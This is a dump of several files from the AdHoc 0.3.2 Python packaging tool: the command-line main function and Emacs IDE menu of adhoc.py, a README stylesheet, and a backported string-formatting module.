ah_run_time_section = ah.prepare_run_time_section()
printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
dbg_comm, dbg_twid, dbg_fwid, ':DBG:',
'ah_run_time_section', ah_run_time_section))
# adhoc_check_modules() # |:debug:|
# adhoc_check_module_setup() # |:debug:|
# adhoc_check_encode_module() # |:debug:|
# |:debug:| compiler
ah = AdHoc()
compiled = ah.compile(myself, 'myself')
printf(compiled, end='')
# @:adhoc_disable:@
# |:here:|
return
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
_quiet = False
_verbose = False
_debug = False
# (progn (forward-line 1) (snip-insert-mode "py.f.setdefaultencoding" t) (insert "\n"))
file_encoding_is_clean = True
def setdefaultencoding(encoding=None, quiet=False):
if file_encoding_is_clean:
return
if encoding is None:
encoding='utf-8'
try:
isinstance('', basestring)
if not hasattr(sys, '_setdefaultencoding'):
if not quiet:
printf('''\
Add this to /etc/python2.x/sitecustomize.py,
or put it in local sitecustomize.py and adjust PYTHONPATH=".:${PYTHONPATH}"::
try:
import sys
setattr(sys, '_setdefaultencoding', getattr(sys, 'setdefaultencoding'))
except AttributeError:
pass
Running with reload(sys) hack ...
''', file=sys.stderr)
reload(sys)
setattr(sys, '_setdefaultencoding',
getattr(sys, 'setdefaultencoding'))
sys._setdefaultencoding(encoding)
except NameError:
# python3 already has utf-8 default encoding ;-)
pass
def main(argv): # ||:fnc:||
global _quiet, _debug, _verbose
global RtAdHoc, AdHoc
global adhoc_rst_to_ascii
_parameters = None
_pass_opts = []
try:
# try system library first
import argparse
except ImportError:
# use canned version
try:
import argparse_local as argparse # @:adhoc:@
except ImportError:
printe('error: argparse missing. Try `easy_install argparse`.')
sys.exit(1)
parser = argparse.ArgumentParser(add_help=False)
# parser.add_argument('--sum', dest='accumulate', action='store_const',
# const=sum, default=max,
# help='sum the integers (default: find the max)')
# |:opt:| add options
class AdHocAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
list(map(lambda opt: setattr(namespace, opt, False),
('implode', 'explode', 'extract', 'template', 'eide',
# |:special:|
'compile', 'decompile'
# |:special:|
)))
setattr(namespace, option_string[2:], True)
setattr(namespace, 'adhoc_arg', values)
# |:special:|
parser.add_argument(
'-c', '--compile', nargs=0, action=AdHocAction, default=False,
help='compile file(s) or standard input into file OUT (default standard output).')
parser.add_argument(
'-d', '--decompile', nargs=0, action=AdHocAction, default=False,
help='decompile file(s) or standard input into DIR (default __adhoc__).')
parser.add_argument(
'-o', '--output', action='store', type=str, default=None,
help='output file/directory for --compile/--decompile.')
# |:special:|
parser.add_argument(
'-q', '--quiet', action='store_const', const=-2,
dest='debug', default=0, help='suppress warnings')
parser.add_argument(
'-v', '--verbose', action='store_const', const=-1,
dest='debug', default=0, help='verbose test output')
parser.add_argument(
'--debug', nargs='?', action='store', type=int, metavar='NUM',
default = 0, const = 1,
help='show debug information')
parser.add_argument(
'-t', '--test', action='store_true',
help='run doc tests')
parser.add_argument(
'--implode', nargs=0, action=AdHocAction, default=False,
help='implode script with adhoc')
parser.add_argument(
'--explode', nargs='?', action=AdHocAction, type=str, metavar='DIR',
default=False, const='__adhoc__',
help='explode script with adhoc in directory DIR'
' (default: `__adhoc__`)')
parser.add_argument(
'--extract', nargs='?', action=AdHocAction, type=str, metavar='DIR',
default=False, const = '.',
help='extract files to directory DIR (default: `.`)')
parser.add_argument(
'--template', nargs='?', action=AdHocAction, type=str, metavar='NAME',
default=False, const = '-',
help='extract named template to standard output. default NAME is ``-``')
parser.add_argument(
'--eide', nargs='?', action=AdHocAction, type=str, metavar='COMM',
default=False, const = '',
help='Emacs IDE template list (implies --template list)')
parser.add_argument(
'--expected', nargs='?', action=AdHocAction, type=str, metavar='DIR',
default=False, const = '.',
help='extract expected output to directory DIR (default: `.`)')
parser.add_argument(
'-h', '--help', action='store_true',
help="display this help message")
# |:special:|
parser.add_argument(
'--documentation', action='store_true',
help="display module documentation.")
parser.add_argument(
'--install', action='store_true',
help="install adhoc.py script.")
# |:special:|
parser.add_argument(
'--ap-help', action='store_true',
help="internal help message")
parser.add_argument(
'args', nargs='*', metavar='arg',
#'args', nargs='+', metavar='arg',
#type=argparse.FileType('r'), default=sys.stdin,
help='a series of arguments')
#_parameters = parser.parse_args()
(_parameters, _pass_opts) = parser.parse_known_args(argv[1:])
# generate argparse help
if _parameters.ap_help:
parser.print_help()
return 0
# standard help
if _parameters.help:
# |:special:|
help_msg = __doc__
help_msg = re.sub(
'^\\s*[.][.]\\s+_END_OF_HELP:\\s*\n.*(?ms)', '', help_msg)
sys.stdout.write(adhoc_rst_to_ascii(help_msg).strip() + '\n')
# |:special:|
return 0
_debug = _parameters.debug
if _debug > 0:
_verbose = True
_quiet = False
elif _debug < 0:
_verbose = (_debug == -1)
_quiet = not(_verbose)
_debug = 0
_parameters.debug = _debug
_parameters.verbose = _verbose
_parameters.quiet = _quiet
if _debug:
cmd_line = argv
sys.stderr.write(sformat(
"{0}{3:^{1}} {4:<{2}s}: ]{5!s}[\n",
((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# ')),
((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (15)),
':DBG:', 'cmd_line', cmd_line))
# at least use `quiet` to suppress the setdefaultencoding warning
setdefaultencoding(quiet=_quiet or _parameters.test)
# |:opt:| handle options
# adhoc: implode/explode/extract
adhoc_export = (_parameters.explode or _parameters.extract)
adhoc_op = (_parameters.implode or adhoc_export
or _parameters.template or _parameters.eide
# |:special:|
or _parameters.documentation
or _parameters.install
or _parameters.expected
# |:special:|
)
if adhoc_op:
# |:special:|
# compiled AdHoc RtAdHoc
# compiled v
# implode req req
# explode req req
# extract req req
# template req(v) req
#
# uncompiled --- AdHoc ---> implode --> (compiled)
# compiled -- RtAdHoc --> explode --> __adhoc__
# compiled -- RtAdHoc --> extracted --> .
# compiled -- RtAdHoc --> template --> stdout
# |:special:|
file_ = __file__
source = None
have_adhoc = 'AdHoc' in globals()
have_rt_adhoc = 'RtAdHoc' in globals()
# shall adhoc be imported
if _parameters.implode or not have_rt_adhoc:
# shall this file be compiled
adhoc_compile = not (have_rt_adhoc
# |:special:|
or _parameters.documentation
# |:special:|
)
os_path = os.defpath
for pv in ('PATH', 'path'):
try:
os_path = os.environ[pv]
break
except KeyError:
pass
os_path = os_path.split(os.pathsep)
for path_dir in os_path:
if not path_dir:
continue
if path_dir not in sys.path:
sys.path.append(path_dir)
if not have_adhoc:
try:
import adhoc
AdHoc = adhoc.AdHoc
except ImportError:
adhoc_compile = False
try:
from rt_adhoc import RtAdHoc as Adhoc
except ImportError:
pass
# |:special:|
AdHoc.flat = False
# |:special:|
else:
adhoc_compile = False
AdHoc = RtAdHoc
AdHoc.quiet = _quiet
AdHoc.verbose = _verbose
AdHoc.debug = _debug
AdHoc.include_path.append(os.path.dirname(file_))
AdHoc.extra_templates = [
# |:special:|
('README.txt', 'adhoc_template'),
('doc/USE_CASES.txt', 'adhoc_template'),
('-adhoc_init', 'adhoc_template'),
# |:special:|
]
AdHoc.template_process_hooks = {
# |:special:|
'doc/index.rst': tpl_hook_doc_index_rst
# |:special:|
}
if _parameters.eide:
AdHoc.tt_ide = True
AdHoc.tt_comment = _parameters.adhoc_arg or ''
AdHoc.tt_prefix = '. (shell-command "'
AdHoc.tt_suffix = '")'
_parameters.template = True
_parameters.adhoc_arg = 'list'
if adhoc_compile:
ah = AdHoc()
source = ah.compileFile(file_)
else:
file_, source = AdHoc.std_source_param(file_)
# implode
if _parameters.implode:
# @:adhoc_enable:@
# if not _quiet:
# list(map(sys.stderr.write,
# ["warning: ", os.path.basename(file_),
# " already imploded!\n"]))
# @:adhoc_enable:@
AdHoc.write_source('-', source)
# explode
elif (_parameters.explode
# |:special:|
or _parameters.install
# |:special:|
):
# |:special:|
if _parameters.install:
_parameters.adhoc_arg = '__adhoc_install__'
# |:special:|
AdHoc.export_dir = _parameters.adhoc_arg
AdHoc.export(file_, source)
# |:special:|
README = get_readme(file_, source, as_template='README.txt', transform=False)
USE_CASES = get_use_cases(as_template='doc/USE_CASES.txt')
sv = AdHoc.inc_delimiters()
AdHoc.export(file_, README)
AdHoc.export(file_, USE_CASES)
AdHoc.reset_delimiters(sv)
# |:special:|
# extract
elif _parameters.extract:
AdHoc.extract_dir = _parameters.adhoc_arg
AdHoc.extract(file_, source)
# |:special:|
# imports, that should be extracted
for imported in (
'use_case_000_',
'use_case_001_templates_',
'use_case_002_include_',
'use_case_003_import_',
'use_case_005_nested_',
):
ximported = ''.join((imported, '.py'))
ximported = AdHoc.check_xfile(ximported)
if ximported:
simported = AdHoc.get_named_template(imported, file_)
AdHoc.write_source(ximported, simported)
README = get_readme(file_, source, as_template='README.txt', transform=False)
USE_CASES = get_use_cases(as_template='doc/USE_CASES.txt')
sv = AdHoc.inc_delimiters()
AdHoc.extract(file_, README)
AdHoc.extract(file_, USE_CASES)
AdHoc.reset_delimiters(sv)
# |:special:|
# template
elif _parameters.template:
template_name = _parameters.adhoc_arg
if not template_name:
template_name = '-'
if template_name == 'list':
sys.stdout.write(
'\n'.join(AdHoc.template_table(file_, source)) + '\n')
# |:special:|
elif template_name == 'README.txt':
README = get_readme(file_, source, as_template=template_name, transform=False)
sv = AdHoc.inc_delimiters()
AdHoc.write_source('-', AdHoc.get_named_template(template_name, file_, README))
AdHoc.reset_delimiters(sv)
elif template_name == 'doc/USE_CASES.txt':
USE_CASES = get_use_cases()
AdHoc.write_source('-', USE_CASES)
elif template_name == 'adhoc_init':
import use_case_000_ as use_case
use_case.main('script --template'.split())
# |:special:|
else:
template = AdHoc.get_named_template(
template_name, file_, source)
# |:special:|
try:
template = AdHoc.decode_source(template)
except UnicodeDecodeError:
pass
else:
template = AdHoc.section_tag_remove(template, "adhoc_run_time_section")
# |:special:|
AdHoc.write_source('-', template)
# |:special:|
# expected
elif _parameters.expected:
AdHoc.extract_dir = _parameters.adhoc_arg
AdHoc.extract_templates(file_, source, AdHoc.section_tag('adhoc_expected'))
# documentation
elif _parameters.documentation:
sys.stdout.write(get_readme(file_, source))
# install
if _parameters.install:
here = os.path.abspath(os.getcwd())
os.chdir(AdHoc.export_dir)
os.system(''.join((sys.executable, " setup.py install")))
os.chdir(here)
import shutil
shutil.rmtree(AdHoc.export_dir, True)
# |:special:|
# restore for subsequent calls to main
if not have_adhoc:
del(AdHoc)
return 0
# run doc tests
if _parameters.test:
import doctest
doctest.testmod(verbose = _verbose)
return 0
# |:opt:| handle options
run(_parameters, _pass_opts)
if __name__ == "__main__":
#sys.argv.insert(1, '--debug') # |:debug:|
result = main(sys.argv)
sys.exit(result)
# |:here:|
# @:adhoc_uncomment:@
# @:adhoc_template:@ -test
# Test template.
# @:adhoc_template:@
# @:adhoc_uncomment:@
if False:
pass
# @:adhoc_verbatim:@ # docutils.conf
# |:info:| The following list is kept in sync with MANIFEST.in.
# This makes it easier to avoid discrepancies between installation
# from source distribution vs. installation from compiled script.
# @:adhoc_include:@ MANIFEST.in
# @:adhoc_include:@ Makefile
# @:adhoc_include:@ README.css
# README.txt is generated
# adhoc.py is this file
# argparse_local.py is imported
# @:adhoc_include:@ doc/Makefile
# @:adhoc_include:@ doc/_static/adhoc-logo-32.ico
# @:adhoc_include:@ doc/adhoc-logo.svg
# @:adhoc_include:@ doc/conf.py
# doc/index.rst is generated
# @:adhoc_include:@ doc/make.bat
# @:adhoc_include:@ doc/z-massage-index.sh
# docutils.conf is included above
# namespace_dict.py is imported
# @:adhoc_include:@ setup.py
# stringformat_local.py is imported
# use_case_00?_* is imported
# adhoc_test is imported
# dist/adhoc.py is generated
# |:here:|
# (progn (forward-line 1) (snip-insert-mode "py.t.ide" t) (insert "\n"))
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: CSCOPE ON
# . (cscope-minor-mode)
# :ide: CSCOPE OFF
# . (cscope-minor-mode (quote ( nil )))
# :ide: TAGS: forced update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k FORCED=1 tags"))
# :ide: TAGS: update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k tags"))
# :ide: +-#+
# . Utilities ()
# :ide: TOC: Generate TOC with py-toc.py
# . (progn (save-buffer) (compile (concat "py-toc.py ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: CMD: Fold region with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces -width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" nil nil nil t)
# :ide: CMD: Fold region and replace with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces --width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" t nil nil t)
# :ide: +-#+
# . Fold ()
# :ide: CMD: Remove 8 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: CMD: Remove 4 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: +-#+
# . Doctest ()
# :ide: LINT: Check 80 column width ignoring IDE Menus
# . (let ((args " | /srv/ftp/pub/check-80-col.sh -")) (compile (concat "sed 's,^\\(\\|. \\|.. \\|... \\)\\(:ide\\|[.] \\).*,,;s,^ *. (progn (forward-line.*,,' " (buffer-file-name) " " args " | sed 's,^-," (buffer-file-name) ",'")))
# :ide: LINT: Check 80 column width
# . (let ((args "")) (compile (concat "/srv/ftp/pub/check-80-col.sh " (buffer-file-name) " " args)))
# :ide: +-#+
# . Lint Tools ()
# :ide: DELIM: |: SYM :| |:tag:| standard symbol-tag!
# . (symbol-tag-normalize-delimiter (cons (cons nil "|:") (cons ":|" nil)) t)
# :ide: DELIM: :: SYM :: ::fillme:: future standard fill-me tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "::") (cons "::" nil)) t)
# :ide: DELIM: @: SYM :@ @:fillme:@ adhoc tag
# . (symbol-tag-normalize-delimiter (cons (cons nil "@:") (cons ":@" nil)) t)
# :ide: +-#+
# . Delimiters ()
# :ide: COMPILE: Run with --ap-help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --ap-help")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --test --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test --verbose")))
# :ide: COMPILE: Run with --debug
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --debug")))
# :ide: +-#+
# . Compile with standard arguments ()
# :ide: OCCUR-OUTLINE: Python Source Code
# . (x-symbol-tag-occur-outline "sec" '("||:" ":||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: MENU-OUTLINE: Python Source Code
# . (x-eIDE-menu-outline "sec" '("|||:" ":|||") (cons (cons "^\\([ \t\r]*\\(def\\|class\\)[ ]+\\|[A-Za-z_]?\\)" nil) (cons nil "\\([ \t\r]*(\\|[ \t]*=\\)")))
# :ide: +-#+
# . Outline ()
# :ide: INFO: SQLAlchemy - SQL Expression Language - Reference
# . (let ((ref-buffer "*sqa-expr-ref*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/reference/sqlalchemy/expressions.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - SQL Expression Language - Tutorial
# . (let ((ref-buffer "*sqa-expr-tutor*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/05/sqlexpression.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: SQLAlchemy - Query
# . (let ((ref-buffer "*sqa-query*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://www.sqlalchemy.org/docs/orm/query.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: +-#+
# . SQLAlchemy Reference ()
# :ide: INFO: Python - argparse
# . (let ((ref-buffer "*python-argparse*")) (if (not (get-buffer ref-buffer)) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " 'http://docs.python.org/library/argparse.html'") ref-buffer) (display-buffer ref-buffer t)))
# :ide: INFO: Python Documentation
# . (let ((ref-buffer "*w3m*")) (if (get-buffer ref-buffer) (display-buffer ref-buffer t)) (other-window 1) (w3m-goto-url "http://docs.python.org/index.html" nil nil))
# :ide: INFO: Python Reference
# . (let* ((ref-buffer "*python-ref*") (local "/home/ws/project/ws-util/python/reference/PQR2.7.html") (url (or (and (file-exists-p local) local) "'http://rgruet.free.fr/PQR27/PQR2.7.html'"))) (unless (get-buffer ref-buffer) (get-buffer-create ref-buffer) (with-current-buffer ref-buffer (shell-command (concat "snc txt.py.reference 2>/dev/null") ref-buffer) (goto-char (point-min)) (if (eobp) (shell-command (concat "w3m -dump -cols " (number-to-string (1- (window-width))) " " url) ref-buffer)))) (display-buffer ref-buffer t))
# :ide: +-#+
# . Python Reference ()
# :ide: COMPILE: Run with --decompile dist/xx_adhoc.py
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cp -p dist/adhoc.py dist/xx_adhoc.py; python ./" (file-name-nondirectory (buffer-file-name)) " --decompile dist/xx_adhoc.py")))
# :ide: COMPILE: Run with cat dist/adhoc.py | --decompile
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cat dist/adhoc.py | python ./" (file-name-nondirectory (buffer-file-name)) " --decompile")))
# :ide: COMPILE: Run with cat /dev/null | --decompile
# . (progn (save-buffer) (compile (concat "rm -rf __adhoc__; cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " --decompile")))
# :ide: COMPILE: Run with cat /dev/null | --compile
# . (progn (save-buffer) (compile (concat "cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " --compile")))
# :ide: COMPILE: Run with cat /dev/null |
# . (progn (save-buffer) (compile (concat "cat /dev/null | python ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --help
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --help")))
# :ide: COMPILE: Run with --template doc/index.rst
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template doc/index.rst")))
# :ide: COMPILE: Run with --template test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template test")))
# :ide: COMPILE: Run with --template
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template")))
# :ide: COMPILE: Run with python3 with --template list
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --verbose --implode
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --implode")))
# :ide: COMPILE: Run with --documentation
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --documentation")))
# :ide: COMPILE: make ftp
# . (progn (save-buffer) (compile (concat "make -k ftp")))
# :ide: COMPILE: Run with --verbose --extract
# . (progn (save-buffer) (shell-command "rm -f README.txt doc/index.rst") (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --extract")))
# :ide: COMPILE: Run with --verbose --template README.txt
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose --template README.txt")))
# :ide: COMPILE: Run with --template list
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --template list")))
# :ide: COMPILE: Run with --eide #
# . (progn (save-buffer) (shell-command (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --eide '#'") (concat "*templates: " (file-name-nondirectory (buffer-file-name)) "*")))
# :ide: COMPILE: Run with --expected
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --expected")))
# :ide: COMPILE: make doc
# . (progn (save-buffer) (compile (concat "make doc")))
# :ide: COMPILE: Run with --eide
# . (progn (save-buffer) (shell-command (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --eide") (concat "*templates: " (file-name-nondirectory (buffer-file-name)) "*")))
# :ide: COMPILE: Run with python3 with --test
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with python3 w/o args
# . (progn (save-buffer) (compile (concat "python3 ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: COMPILE: Run with --test
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --test")))
# :ide: COMPILE: Run with --verbose
# . (progn (save-buffer) (compile (concat "python ./" (file-name-nondirectory (buffer-file-name)) " --verbose")))
# :ide: +-#+
# . Compile ()
#
# Local Variables:
# mode: python
# comment-start: "#"
# comment-start-skip: "#+"
# comment-column: 0
# truncate-lines: t
# End: | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/adhoc.py | adhoc.py |
html, body, div, span, applet, object, iframe,
h1, h2, h3, h4, h5, h6, p, blockquote, pre,
a, abbr, acronym, big, code,
del, dfn, font, img, ins, q, s, samp,
small, strike, strong, tt,
dl, dt, dd, ol, ul, li,
fieldset, form, label, legend,
table, caption, tbody, tfoot, thead, tr, th, td {
margin: 0;
padding: 0;
border: 0;
font-weight: inherit;
font-style: inherit;
font-size: 100%;
font-family: inherit;
vertical-align: baseline;
}
body{
line-height: 1;
}
.xx ol, .xx ul {
list-style: none;
}
/* tables still need 'cellspacing="0"' in the markup */
table {
border-collapse: separate;
border-spacing: 0;
}
caption ,th, td {
text-align: left;
font-weight: normal;
}
blockquote:before,blockquote:after,
q:before, q:after {
content: "";
}
blockquote, q {
quotes: "" "";
}
body{font:13px/1.231 sans-serif;*font-size:small;*font:x-small;}
select,input,button,textarea,button{font:99% sans-serif;}table{font-size:inherit;font:100%;}pre,code,samp,tt{font-family:monospace;*font-size:108%;line-height:100%;}
div {
position: relative;
}
section {
position: relative;
display: block;
}
h1 {
margin: 0 0 15px;
padding: 1em 0 0;
font-size: 21px;
line-height: 24px;
color: #666;
}
h2 {
margin: 6px 0;
padding: 10px 0 0;
font-weight: normal;
font-size: 18px;
line-height: 24px;
color: #666;
}
code {
border: 1px solid #ddd;
background: #f7f7f7;
padding: 0 2px;
font-size: 0.923em; /* 12/13 */
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
border-radius: 2px;
}
pre code {
border: none;
background: none;
padding: 0;
font-size: inherit;
}
h1 code,
h2 code,
h3 code,
h4 code,
h5 code,
h6 code {
border: none;
background: none;
}
h3 {
margin: 6px 0;
padding: 10px 0 0;
font-weight: normal;
font-size: 16px;
line-height: 21px;
color: #666;
}
h4 {
font-weight: normal;
color: #666;
}
ol {
list-style: decimal inside;
}
p {
margin: 0 0 9px;
}
pre {
margin: 0 0 1em;
-o-border-radius: 3px;
-ms-border-radius: 3px;
-khtml-border-radius: 3px;
-webkit-border-radius: 3px;
border-radius: 3px;
border: 1px solid #ddd;
background: #f7f7f7;
padding: 3px 6px;
font-size: 12px;
line-height: 16px;
white-space: pre-wrap;
}
ul {
display: block;
list-style-type: disc;
/* margin: 1em 0; */
padding: 0 1em;
}
@charset "UTF-8";
@media print {
* {
color: #000 !important;
}
body {
background: #fff !important;
}
}
body {
margin: 0;
background: #fff;
padding: 0;
line-height: 16px;
font-family: Helvetica, Arial, sans-serif;
color: #393939;
}
p {
line-height: 18px;
}
a {
text-decoration: none;
color: #2b547d;
}
a:focus {
color: #69f;
outline: none;
}
a:hover {
text-decoration: underline;
}
table {
border-spacing: 3px;
}
strong {
font-weight: bold;
}
em {
font-style: italic;
}
table input, select {
margin-bottom: 1em;
}
table th {
vertical-align: top;
}
html, body {
height: 100%;
}
form {
margin-bottom: 0;
}
input {
line-height: 16px;
}
input[type="url"], input[type="email"], input[type="password"], input[type="search"], input[type="text"], textarea {
background: #fff;
color: #525252;
padding: 4px;
font-size: 14px;
line-height: 18px;
height: 18px;
border: 1px solid #ccc;
-moz-box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
-webkit-box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
box-shadow: inset 0 4px 4px rgba(0, 0, 0, 0.03);
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
border-radius: 4px;
}
input[type="search"] {
-webkit-appearance: searchfield;
border: none;
}
input[type="radio"], input[type="checkbox"], input[type="submit"], input[type="reset"], input[type="button"], input[type="file"], select {
font-size: 1em;
}
select {
line-height: 16px;
}
h3, h4, h5, h6 {
margin-top: 0;
padding-top: 0;
margin-bottom: 3px;
}
hr {
padding: 0;
margin: 5px 0;
height: 1px;
border: none;
border-bottom: 1px solid #ddd;
}
code, pre, textarea {
font-family: Monaco, "Courier New", monospace;
}
pre, textarea {
font-size: 11px;
}
a img {
border: none;
}
fieldset {
margin: 0;
border: none;
padding: 0;
}
div {
margin: 0;
padding: 0;
}
p {
margin: 0;
padding: 0;
}
table {
padding: 0;
margin: 0;
}
th {
vertical-align: top;
text-align: left;
}
table {
margin: 9px 0;
border-collapse: collapse;
}
table th,
table td {
border: 1px solid #ddd;
padding: 3px 6px;
}
table th {
background: #f7f7f7;
font-weight: bold;
}
blockquote, .xx ol, .xx ul {
list-style: none outside none;
margin: 0;
padding: 0 0 0 36px;
}
p {
margin: 9px 0;
line-height: 18px;
}
body {
margin: auto;
width: 70%;
}
.admonition-title {
font-weight: bold;
} | AdHoc | /AdHoc-0.3.2.tar.gz/AdHoc-0.3.2/README.css | README.css |
import re
__all__ = ['FormattableString', 'init']
if hasattr(str, 'partition'):
def partition(s, sep):
return s.partition(sep)
else: # Python 2.4
def partition(s, sep):
try:
left, right = s.split(sep, 1)
except ValueError:
return s, '', ''
return left, sep, right
_format_str_re = re.compile(
r'(%)' # '%'
r'|((?<!{)(?:{{)+' # '{{'
r'|(?:}})+(?!})' # '}}
r'|{(?:[^{](?:[^{}]+|{[^{}]*})*)?})' # replacement field
)
_format_sub_re = re.compile(r'({[^{}]*})') # nested replacement field
_format_spec_re = re.compile(
r'((?:[^{}]?[<>=^])?)' # alignment
r'([-+ ]?)' # sign
r'(#?)' r'(\d*)' r'(,?)' # base prefix, minimal width, thousands sep
r'((?:\.\d+)?)' # precision
r'(.?)$' # type
)
_field_part_re = re.compile(
r'(?:(\[)|\.|^)' # start or '.' or '['
r'((?(1)[^]]*|[^.[]*))' # part
r'(?(1)(?:\]|$)([^.[]+)?)' # ']' and invalid tail
)
if hasattr(re, '__version__'):
_format_str_sub = _format_str_re.sub
else:
# Python 2.4 fails to preserve the Unicode type
def _format_str_sub(repl, s):
if isinstance(s, unicode):
return unicode(_format_str_re.sub(repl, s))
return _format_str_re.sub(repl, s)
if hasattr(int, '__index__'):
def _is_integer(value):
return hasattr(value, '__index__')
else: # Python 2.4
def _is_integer(value):
return isinstance(value, (int, long))
try:
unicode
def _chr(n):
return chr(n % 256)
except NameError: # Python 3
unicode = str
_chr = chr
def _strformat(value, format_spec=""):
"""Internal string formatter.
It implements the Format Specification Mini-Language.
"""
m = _format_spec_re.match(str(format_spec))
if not m:
raise ValueError('Invalid conversion specification')
align, sign, prefix, width, comma, precision, conversion = m.groups()
is_numeric = hasattr(value, '__float__')
is_integer = is_numeric and _is_integer(value)
if prefix and not is_integer:
raise ValueError('Alternate form (#) not allowed in %s format '
'specifier' % (is_numeric and 'float' or 'string'))
if is_numeric and conversion == 'n':
# Default to 'd' for ints and 'g' for floats
conversion = is_integer and 'd' or 'g'
elif sign:
if not is_numeric:
raise ValueError("Sign not allowed in string format specifier")
if conversion == 'c':
raise ValueError("Sign not allowed with integer "
"format specifier 'c'")
if comma:
# TODO: thousand separator
pass
try:
if ((is_numeric and conversion == 's') or
(not is_integer and conversion in set('cdoxX'))):
raise ValueError
if conversion == 'c':
conversion = 's'
value = _chr(value)
rv = ('%' + prefix + precision + (conversion or 's')) % (value,)
except ValueError:
raise ValueError("Unknown format code %r for object of type %r" %
(conversion, value.__class__.__name__))
if sign not in '-' and value >= 0:
# sign in (' ', '+')
rv = sign + rv
if width:
zero = (width[0] == '0')
width = int(width)
else:
zero = False
width = 0
# Fastpath when alignment is not required
if width <= len(rv):
if not is_numeric and (align == '=' or (zero and not align)):
raise ValueError("'=' alignment not allowed in string format "
"specifier")
return rv
fill, align = align[:-1], align[-1:]
if not fill:
fill = zero and '0' or ' '
if align == '^':
padding = width - len(rv)
# tweak the formatting if the padding is odd
if padding % 2:
rv += fill
rv = rv.center(width, fill)
elif align == '=' or (zero and not align):
if not is_numeric:
raise ValueError("'=' alignment not allowed in string format "
"specifier")
if value < 0 or sign not in '-':
rv = rv[0] + rv[1:].rjust(width - 1, fill)
else:
rv = rv.rjust(width, fill)
elif align in ('>', '=') or (is_numeric and not align):
# numeric value right aligned by default
rv = rv.rjust(width, fill)
else:
rv = rv.ljust(width, fill)
return rv
